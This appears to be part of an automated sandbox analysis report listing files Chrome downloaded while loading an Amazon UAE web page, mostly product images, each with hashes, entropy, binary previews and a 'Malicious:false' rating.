                                                                                                                                                                                                        Preview:<!doctype html><html lang="en-ae" class="a-no-js" data-19ax5a9jf="dingo"> sp:feature:head-start -->.<head><script>var aPageStart = (new Date()).getTime();</script><meta charset="utf-8"/>. sp:end-feature:head-start -->. sp:feature:csm:head-open-part1 -->..<script type='text/javascript'>var ue_t0=ue_t0||+new Date();</script>. sp:end-feature:csm:head-open-part1 -->. sp:feature:cs-optimization -->.<meta http-equiv='x-dns-prefetch-control' content='on'>.<link rel="dns-prefetch" href="https://images-eu.ssl-images-amazon.com">.<link rel="dns-prefetch" href="https://m.media-amazon.com">.<link rel="dns-prefetch" href="https://completion.amazon.com">. sp:end-feature:cs-optimization -->. sp:feature:csm:head-open-part2 -->.<script type='text/javascript'>.window.ue_ihb = (window.ue_ihb || window.ueinit || 0) + 1;.if (window.ue_ihb === 1) {..var ue_csm = window,. ue_hob = +new Date();.(function(d){var e=d.ue=d.ue||{},f=Date.now||function(){return+new Date};e.d=function
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], progressive, precision 8, 1500x600, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):92658
                                                                                                                                                                                                        Entropy (8bit):7.948149613967599
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:1536:fnAvuuA3l5o0u3Zp0wTMmcAyjL5s8POxnyx+3N7i3/kdmV/sq2apnNfweqZz6wr7:fkRMW0+klmEjL5fP4yxCNA/Ywsq2dZmG
                                                                                                                                                                                                        MD5:744586DF892472843C31E081882DDB1B
                                                                                                                                                                                                        SHA1:4A5E84553974BD7A43A63F99509FEE1EEF59DA20
                                                                                                                                                                                                        SHA-256:18E50E9F054AB004A35C6FA0EA46C440D0DF1C6A1C3152262D3CF43B814DBFA5
                                                                                                                                                                                                        SHA-512:E0FC2159EADA064F4E79326DD574B791BDE588CDC04AD02849F962C73D737A9C532CA933235197B238140604E9BFE4EC70C6EA349B5603DA0F29F11848F9F2C0
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://m.media-amazon.com/images/I/61EnuTSAVeL._SX1500_.jpg
                                                                                                                                                                                                        Preview:......Exif..II*.................Ducky.......7.....2http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c002 79.a6a63968a, 2024/03/06-11:52:05 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 25.11 (Macintosh)" xmpMM:InstanceID="xmp.iid:448DAF084B5811EF8C44DC556605C1E6" xmpMM:DocumentID="xmp.did:448DAF094B5811EF8C44DC556605C1E6"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:2C8E13E74B5811EF8C44DC556605C1E6" stRef:documentID="xmp.did:2C8E13E84B5811EF8C44DC556605C1E6"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>...!Adobe.d..............i:......i............................................................##########................#############
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 142x116, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):1779
                                                                                                                                                                                                        Entropy (8bit):7.618580132227298
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:TT0r9DMkaeL1Vq0E92zVboguooxh8V/uOx4:TCOeLvrmUlobT4oOx4
                                                                                                                                                                                                        MD5:E1EBCF5EDB7C9FF71CF0E58D8A040BD3
                                                                                                                                                                                                        SHA1:F811F86A245395ADB8C9A6604E38BF8587E37659
                                                                                                                                                                                                        SHA-256:AE90D8D0286FBE0A5D5A8720EA72798EEADB8C9F2101C197FB2601890CC1B261
                                                                                                                                                                                                        SHA-512:0C492DC805C2C984ED4F146C28F3E8E4347DB7BCC7B7F50C6FDFEF27574EAB8848E304C56537C22B88213B8EAF68E36DE8434875527282EE35751B15F115202C
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."..........{......................................................!1Qq.A.."Ra....2..#$3Br..........................................!1............?...............*"..I.x.8.K...d..5..t....[.<'.o=...4&.....o...c.t......',...um.SA..K.~..7d..~.!0..................+..v......_.=Nc....p..`.m \.}.......8......N....cT...4.x..2O...^.vL.Dq\..............6.-.w.Z.m\$@\.<.......M\i..~X...<..p!L.S..-u...F...k. Z8".j.p{Z..sZGg...t%..,6z..,..E.............!A.j.k._I..TCp|...ej..,v....{.......Z5s>..I$9vIq....~.X........k......#.1Mr.n.4..4.!x....g...z1e.#..a..b...............!.w.QM...~I..[+..b.:B..k.j_.X.1t...U....................;=-.85s..t.|.^Z..........WP...'.#.Ygnz...v.ig.....K8..K.V..qi....x.........>..am.....k@..@7...Y......+.11...&W...4.}.\u..T.4t]..........Dm.=Ja...-{G.g..ky....9.f^....8.3t....2N;..V...
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):43
                                                                                                                                                                                                        Entropy (8bit):3.0314906788435274
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:CUnl/tExltxlHh/:/Ob/
                                                                                                                                                                                                        MD5:58B6EAB85C3D693580CE3B2D5E559C37
                                                                                                                                                                                                        SHA1:894476FCCD60AF0E4842D8657A36D8186E34A382
                                                                                                                                                                                                        SHA-256:39F08C4011AC739FB84EB16366FB23338E4DF27D54A459327A95C99C03512FFD
                                                                                                                                                                                                        SHA-512:E5E5C896EDB21F6A6F420055516877577F6EF4A00492CA9A76E72AA95D0BBAA2E86C4897C1EAE1D449E7B5DAF0EDB8D42E4CD8CF837FD9BA5859B2B833AE9020
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 186x116, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):2435
                                                                                                                                                                                                        Entropy (8bit):7.758972943518561
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:TT0r6lrE9CZTBH4kXXsFd0aBzPacvj/pGUnD+OVbK:TsCfBHizS8j3nHbK
                                                                                                                                                                                                        MD5:0F23329CFBCCCEF7F1F761A4DD101445
                                                                                                                                                                                                        SHA1:885A686AAF453B4994410DCFE4074402F0EE89C5
                                                                                                                                                                                                        SHA-256:45C12CC0FD3E40394DE45770221E50489F32B8B8145F5587C643FC9F8E8612B7
                                                                                                                                                                                                        SHA-512:441EA68739A45C35EBAD77FFD20915289ECBDF1E9627B8E5B0C3E0D161EC7073DCC5354CDEC13851EA5047762CC049181AEF2BD6EE0A364521ED860B4F1DF4F2
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t....".............................................................!..1AQ."aq.....#Rr.2b...$C..B................................................1!"A.Q............?..." ...""....%u..u1@....9.....1.....A.6..L..#...B.z7./.V........&.D.""...." ...""...." ... D@2...V8.$....wM..d...=.w.....4.Y.:.........w..M%..n.+~f...c.BN...@5.|..?.F._.."^Q.[.s...S[.?3.../. ....4..A..).>...h5-.X. ...V.,..<K.&.S.M~.?.....}\..J....>lK... ....d....H.~....3........L..C.W...O.\...3G%KV..DD..D@...DD....D@."1...V.+.......E...xe..#l.E.S....O...nV......_...j.......q..I....=I^{.......\~B....ip.b.uj..|G.*~D.$-Q....s^.%....Ku...U*.2!.ONzr..{.....WG........u.s...{...b...|D...~.EF.O..M.;...\..*NS...q-...{4...w'5..+...xA.q...c?.(K$.c.sZ....fF.D.o[.;@j.p.....i...+..N.{.3*.i........kS_..#.(7..j6k....FAL.........<F0fs.Y..1i.....R.v..m.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 186x116, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):1743
                                                                                                                                                                                                        Entropy (8bit):7.301820484321456
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:TT0r6ALCHxsSLQh5xbVOhgbvliwX/ezCIFAw1g6pw+Afb:TaCR6JRcSPjevC
                                                                                                                                                                                                        MD5:DCDE9891099D5855328A58D3359DAA41
                                                                                                                                                                                                        SHA1:6975C1DC99283AA4289EA05F3F955052982A3456
                                                                                                                                                                                                        SHA-256:DA6082BDB2CF7EFD68A42CBC77E244FC4E4856DC930FB7CC467A06A3396C02A7
                                                                                                                                                                                                        SHA-512:D9CD213E69C9C783893766E80ADA0CB85205B6D4AE5A0CD8D130DB43BE3D8807FAF1145D76F369D25BB7F677E8CB1967A56067E9F9991F9F257439A1E065B1A3
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t....".............................................................!..1A."#Qq...2BSab..4crs..................................................!1....2Aa..Qq.............?.....t@.............................................................c9..2i|^.u.;z)..\|.....k...f.3.ed...p8MC....i.V....sF......4.>..mb.[O..W....u../%..c....Z....5.X.MN....$...g.........v.q..6i...-...M.j.....1r.Y4.w1.+.R.....T........g.);;.U.q..R56...M.4..{.WA.... L...........9..Jtmb..S]...{$.-.{T.i...Q..SS..=lE..C..Y/X..yU.R*Q.'...-..+....r8....}...]*}..n.Yw.[...BnQ.W..R....;.}*..W.............9Cw...,y..+.Fw.{^R...nm.o.K8O....;.1%9S...%.....G...P.]B..\.5.XA.Jm....'7...Q..=...].....t.x.t...-$.>...._kq...Y.....QR.[=.$.k..^..?.3....#.RQ..%q....q...{...F...S%.I...E..-._.SW..:N.Iw&.R..ZTrM|i.....yF.N...Vx..*F.q.f..g.Ko,..0.5.~.......
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 134x200, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):10687
                                                                                                                                                                                                        Entropy (8bit):7.962704409267389
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:xofHQVafPGFWyKYbXrEWZs6yBYsfvKlCVM8Dv2i8TEJxS8Kj6T7CoQUo3m6:6fH73IjTmBvvgCVVW86G23F
                                                                                                                                                                                                        MD5:FD6BBA265806954EF7B84B8E72363AB9
                                                                                                                                                                                                        SHA1:BAEEC64EFED95E18049D4CB9E8774B99210E4FBC
                                                                                                                                                                                                        SHA-256:916ECB03C89512414F0323FF6859F1F9F8594E99DD279A9EC0A313FEAF232B59
                                                                                                                                                                                                        SHA-512:00DF18D4D7ED892A60DC81BCF760017B1520C7442C012D34A774B204E6E92FFF21459D65800C545F3A6F6612BE1FAA8984E318A8AA252E11665E61F4FDA23878
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://m.media-amazon.com/images/I/81B7s-7r48L._AC_SY200_.jpg
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."...............................................................!.."1.AQ.2a3BRqt....#4U....$C...5bcrs.......D.....................................................!1.AQ...23aq..RSr...bs......".#B...............?..x..6..*A,.sIq.86iH.(....$.>..)xJ../\.\C.6i..(.9..$.8K.8.0.........%P.S...B..`J'..\...=..:.R..l.5uyS.7..D9...=L..M...F(..;.P...W...V(..+.-#A+....cp..M.r.`|..''...<.w..m..O.O.O..:+w...Y<....3Av.h..5W./.5W.g...e-,..........#.I....XwBi...0.v.."..U..<._....<._....qaxo.a......,g."..........v.Ao.Rz_/....U.....U.....U...3O.[......F..v...<.6S..C..V..+..s(.r....{:.5l....G.......]...j..U_{..u..j..3.J/...JuqbG.q....(.._c.....<`.}.8....-f...._.....ZB..7 .Svs..G.V>.|..do0.C..[..{.............>iG*.:A....o".?9.h...b=P.O-...k..l~..N'.Z.C.x..y.....7..G..8Y.-..f...o.....^..G.fU\%V..Z....2.[.D.....
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 167x200, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):11385
                                                                                                                                                                                                        Entropy (8bit):7.960975339173795
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:mT4wHXwlTixzvHmxj8dB792TzKN2HWbFMsMBEe/Sd9OwJaog+LBoDqmx+jesn6:mH4TsvHxv7MTzk2HG9d9Okao9MqBVn6
                                                                                                                                                                                                        MD5:AE29AF23C6AE14B0C4639925C6D91EBA
                                                                                                                                                                                                        SHA1:750FB074BDC3AA5EC55F11E3627D76CF954A3A64
                                                                                                                                                                                                        SHA-256:EEBC05F1C6805700CE3C52C4AD78790647006F8BABCB1AB379E51F1DCD162729
                                                                                                                                                                                                        SHA-512:3BBFFFF0CC126D0B35B7D46F2BC91B03DBA8ABEEAAFDE5A9CAB04256F0387458EB940B1744EC72F972CD975387025C3A8245E19E55B347041607032ADC5ADA58
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://m.media-amazon.com/images/I/71YXfRqyg3L._AC_SY200_.jpg
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."................................................................!..1A."Q.246qrst.......#3RTUu.....$5BSa...b...%CDc...................................................1!.."2A.3Qr...S..#4BRaq................?.V...F..56eE.\.GOW$..A+F.ys.6[nw8..MU.....J..CS!$.@".p.....Rf...]].Kg`..f}.G{......lm.j'.'.#..d.d..#.,gA.c........wh...1._<..j.+!..BG=.^A*C.U.B.P./._.8...z.3......H.St.*d.....r.O..e5j.5.K.8t%)R...Y.wP.....{...((...hr.....;....p.Lm.S....%or.....^._x....K...\.A.}d.J..Q+;..*..rI.v...:A`|.j...X.}..#..ce.. ..2\...)../^....:9.TZ..J........rG...NY.g.|..!..z..t.. ..%......6.!.?n...:..d..n...:..d.....Lz.56....z..0..y.]...dI0....<..U.L.[...<..U.L.[.c.Q.......K...v}.YzJ.SI... ...|+.......\..W.2}lO.\..W.2}lz.7fzfhL.... .)c_.B......Ju...&A<)F..S......z..a.u.?9.~.'...u.z.....~.......)..........G
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 250x214, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):6770
                                                                                                                                                                                                        Entropy (8bit):7.890672655748658
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:Tw0BVed3l4oaoRRD4vAnrsf0uMRJl9oqCrtHWyFHZl3p/JsHq4GTlqYZi2kfCies:n323zaeRDKnMHlJ+BjFnjsK4IlhR0
                                                                                                                                                                                                        MD5:59C64790B2D0D60136EF1754BBF5B8F3
                                                                                                                                                                                                        SHA1:33A78FC6630988FA056309210FB31E1CF64A37CF
                                                                                                                                                                                                        SHA-256:551A18BC3BB11D9C6F5BDDF484408638469E73A82531DE25E96B1608066E5004
                                                                                                                                                                                                        SHA-512:BAD79B200280A3EB7461B077A2E14196CF1B7EC3339E1A94EC6834240A9BA57E3895AE9EB3DD72478C83722E02AA4A413CF274B2A1FC768F128464DDDBF7DAE5
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://m.media-amazon.com/images/I/31OWvO7ZDCL.AC_SX250.jpg
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........5..........................................................................:x...2m.o+....a.}>.0...t..Ah....#....<.c.c......[.lr..(.oi...............a......._$....)..@0T..D2...<.......c5s.|}`...^a.oU5R..t.-.i.U.....g...oqc.....E{..l.q...j.gk..........6.&....1.k0....f.64....*..i..O..M,...'9k.\E.F.7.w/rX.....k........gxe.d..2...c..";...$.[p"..(..6......DVG5..O.[.....d...>.2...p:..Euo+{,4: Q.]]J..*...E.W.sv.>kjY.*...kx.1^.._yt.^R.kji.....J....:......y.s...w..8..,02..<6.;..--.q.Y..A._.@.[].n\..wW..~...S.:Ge....]....3.+(.J.......n#..).Q....a..s.ZE........h.m.~..E....p...2..t.OPab...n.>..p.Y^.6...6>..N...g.z....\...w.N.[q.......[..n....=.kzw.5u...=_o._e.98.*.........[...j........~}z.6....N..^8...[t.+..?.#..c6.}a.:>P/......4n..z..?.....B.....(.R. Rl...->..I.e.~...........\..ZM...
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 153x200, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):4741
                                                                                                                                                                                                        Entropy (8bit):7.9140434640699056
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:TkLwsurxVGZ7SY1HOHi1G0wDr/McvBm7rjitzCGwmDSm52RSFLuHRViiwSldYYw:QLyihcocvBm7rW1JDf2RLxVimw
                                                                                                                                                                                                        MD5:1694E43292D6ECD7021F071831DF89C3
                                                                                                                                                                                                        SHA1:486C30B8B7BF8AAAD2D10B24BE2760D8BD0A6918
                                                                                                                                                                                                        SHA-256:F755C76FC422725730AF219AF92A21B4754E17B64D8914A4365245D099F0322C
                                                                                                                                                                                                        SHA-512:2C46B7892C1D10AC11B48807787BF058E5E69FC40BD41FFDCE7AF0A2129CDBBC39C35FDC27A0B1B1AB33A813A01057D962A4597A157BD99AA059286381BFA76D
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://m.media-amazon.com/images/I/61-jK4RR+mL._AC_SY200_.jpg
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*...........".............................................................!1A...Qaq."2.BRr........3b..$%C......#5Scs..t..................................................!1..#2."3AB.QR............?..Z..Q...2..V.[.=....q.J.H.j7"z]3..7....i...)......LU.:....U#..}.:.uu......=...V..HK..h.x.WK.f..e.3E..'.*.C.L....z..F.....M...T.W...j........kE..&.f.J......UZ.L..\..-Ty..}..p..~..0s..j..]?.......|..z...Z........v.w.......}....3JV..?h...Si.:....>lr..G^...6t........c.}-kE.6t.k....5....p2.0.+h..w.Pz......S..g.c...W.l.XMi...V...k3....W......n..|.Y.G..I...{6..>=>.pxSii.5<h.w.X&.}!h=c.....X.f.?'....d.....z.,/ub..!.'ktDO.7gvi...H......'".5.@..A.!...B.#..Z+P........3.....*.3N....L..6....}..[.l.#.C._Iv.]6.l.R.X..;..;o..\a....kLR...#&z...Y..,=..e..4+._p9.2.K..`Zg...tV..)Z...$../D....E.....Pz..n.y..T..0.....t..D.S..m.>7.....W.j
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 306x200, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):16961
                                                                                                                                                                                                        Entropy (8bit):7.944144237250743
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:lFmPFfI+FnjMFOZPXHunsX9XcqLYIQ3ANjvyxU2JMmr:ydQ+NOi/OIcqsIQ3AAxU2JMmr
                                                                                                                                                                                                        MD5:595D46FC2E027AA73777D6F1A4C0666D
                                                                                                                                                                                                        SHA1:06DF29CA0F22B6618500B4C21D43C790105D0FE6
                                                                                                                                                                                                        SHA-256:8FE8CEE6D7296BB28158826CA3EA5D4E48DD940B6FE25769E69B828D12F8B3A5
                                                                                                                                                                                                        SHA-512:7E6629ECC19FA3380E57F9AF620D89E6FC72C281B31D95F4300AAF981914E109903FF3527BC61C69C3C4D33F114F20B28F652D53CABF4BBD27E3F2F468E4F8F9
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*........2.."..........4.................................................................\\.1..-.X...y...G.U.0>.7.....@.j...)Qfq\..E...e+..........{;VY.K....>..l..........vlk.....h|.N.....y.w.j....n.h..2..wd.u..ld.....R......n..k.W,~...g..............w.%..&:8.i.#..&...t......]..x.?....k..`.].c7#..{a..GH....h..:S.*..J.@..m.82........u..a.Gz~(..Qv.{F...I\.C-.p.=....&.4.....t.U..j......Z.{..0......+.+..........<...V.=h..b.^3.....^....Z.S:..d.....7s4..2.5..Fn....qH.)....;.....1n...c-...."..S....i3...!P.....;3..Xu....3...1..3..!.x.FKU....B...>....XK..>...}.9&..........;.....;>..Y.....s-.1......m..)*.=?.m.rpj....gf..c}.d.(...N#...g..<..A...s.L.......dxl.J.P.z......cX..y........p...En..\f.Q.UZ....G.....N..2.,.VdZ.#..m..|..&._.m..Tk.....Z@.."4.7.0.JWT.}....<.yx.a.p...}...w..8X)..k..)..1.z....4.&k.6
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 166x200, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):8400
                                                                                                                                                                                                        Entropy (8bit):7.9486007861616645
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:gRNBD9lK4NJ/XVM44lCkRViLp/ZFIQUvrgLTiyk:QBO4RM44l9X6hZmUXiyk
                                                                                                                                                                                                        MD5:58F0319D9F2025BA4F0003FC93B1C5C7
                                                                                                                                                                                                        SHA1:9A63CB7711F1DE10064F4AFE6399B2A6DC9C1667
                                                                                                                                                                                                        SHA-256:C41226B85ED60E92418800485D900D69BA7326A2F8665B9F7397FC35E90A9A6F
                                                                                                                                                                                                        SHA-512:25DA3C1AB169A7483B7C20B24FCB4CE528A001D5AB5B7854AE7BBA31552189BCFCFFAD3140A51D243387DC283803670365FE31921AB8A9052DA4710BDD6752D0
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://m.media-amazon.com/images/I/61gfdNg8jyL._AC_SY200_.jpg
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..................................................................!1."2U....#$36AQRSqu......BCb....ac..Ts..47Dr..Et....................................................!1R...#23AQq."Ba................?.......OP.._M.6.3E.0.....P.n.........J..2zU._{...a{.^.T....7.+....Q.....d..3E.&....J..2zT~zf..u..=*..@I.=3~R..L......)]~&OJ.4P.o.L....'.G.o.W_...:.@gu.!..\.%.......4..._Q..=..Y!.R.<.....P.W.o.W_.....7.+....W[\.....A.n.v.......T..S>.....W...7.d........J..2zT~zf..u..=*G..,.....lO`.&........5.....Y[.n.....m....J5.Z.G]C...gI..I.y.N...v.-..........Y.$1.)..N.).!..y~/....5.&.|./....!.e...N....o..VJ...m.........-..{....TA..>r....m.y..l...m..zI.,......1q.@.ZV.V....`...{.nG.t..flqiB...=q.?.B.. ......Q.r8M....]\<.Mp.;.R..H.%...vU`....^........,...O..l.%.{.5...[O..Y!wW_]I..J......R....R5.....7..G......7..
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 186x116, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):1685
                                                                                                                                                                                                        Entropy (8bit):7.264365815081339
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:TT0r6pUQTE0Qop5Zt/Uf/PokOyYD4diebJeyO:TK3pw5ZtsHP3BHt9eL
                                                                                                                                                                                                        MD5:26182EFBD4979DD69FE1EB517F9A39DC
                                                                                                                                                                                                        SHA1:DC8D3C0A23239F449639292CEFDEB6BD5589000A
                                                                                                                                                                                                        SHA-256:215741A74180546322A1586F0B660BBA2A5313116789021D9A204A084686ACED
                                                                                                                                                                                                        SHA-512:C18C9F572C626F48CB8B4459DA1091A91E2B4821EF51BACE283CA275B41DF3B7C0128828630552125F350634156C2CE39CBBF0959357550624338A2A3832A14F
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://images-eu.ssl-images-amazon.com/images/G/39/UAE-hq/2024/img/Kitchen/XCM_CUTTLE_1715685_3745538_372x232_2X_en_AE._SY116_CB558011712_.jpg
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."...............................................................!1.2Q.ABaq.."R......b..................................................!1...Q.3Aq$2BR...............?.....t@.............................................................zk[.MI..-.e.......*..d...l...}..U.."...'..,.G....k}...^{._Z.K.....C#..~.Z....l,...IF.FQ..Ku.&(.D..{...o.y..HC2...$..R\...W5.Az.....NMW...m.j{}vob^...t#.Gz..D............B.)N.q.....rQ.kg..m..>.t..Z...>HE...0.......c|.\.k..o.U'.G.X.]W9..6..p.,2...".%E..%.....o..Svw[4u..6<.DW.[{.9l.S"..Qt..../.....n...4...9=..oh....Z~.4|.o.7..l.xG..n'./...$(...D<.f.....'.....^8Z..yd..7..O&..,vO..pYV...Z..z....j..N}.....p..1.m.a..5r8.NQj..}..J?.tvp.../o..c.E...v.........Y..d..3..F-..v.......L.G.]'/"..6...kQ..AcA.ty.t.%q..OY:......I./.sSP....a.hY.d..F?.....~.(.....~....vNDT.z..
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:Unicode text, UTF-8 text, with very long lines (562)
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):93236
                                                                                                                                                                                                        Entropy (8bit):5.397125859693619
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:1536:eEIiqW8dnB13P6Av59IWb7lIdGd0NQ1X0L7SjR9dgl/aaRZfLRnChZhpHju90u13:xYcQZMuZ7q9P1+pKbaM
                                                                                                                                                                                                        MD5:7DBD0AF1B1B4C7BE16180F86EF947E6B
                                                                                                                                                                                                        SHA1:A4332F3C2B25B2294A446EE8F9A7CAAE8236201A
                                                                                                                                                                                                        SHA-256:30711CA94E9E52400EC9262D2948EC5CD91230C43EFE4E414A39682ED4782F99
                                                                                                                                                                                                        SHA-512:EA05B2825411E1ADE46877378F01186813B4DC07A8F1E787D51A37CE977D4A0776A46AC49CD4FFE0BA22D2010E104D53397649D097A1FDD369E626F06B2701AC
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
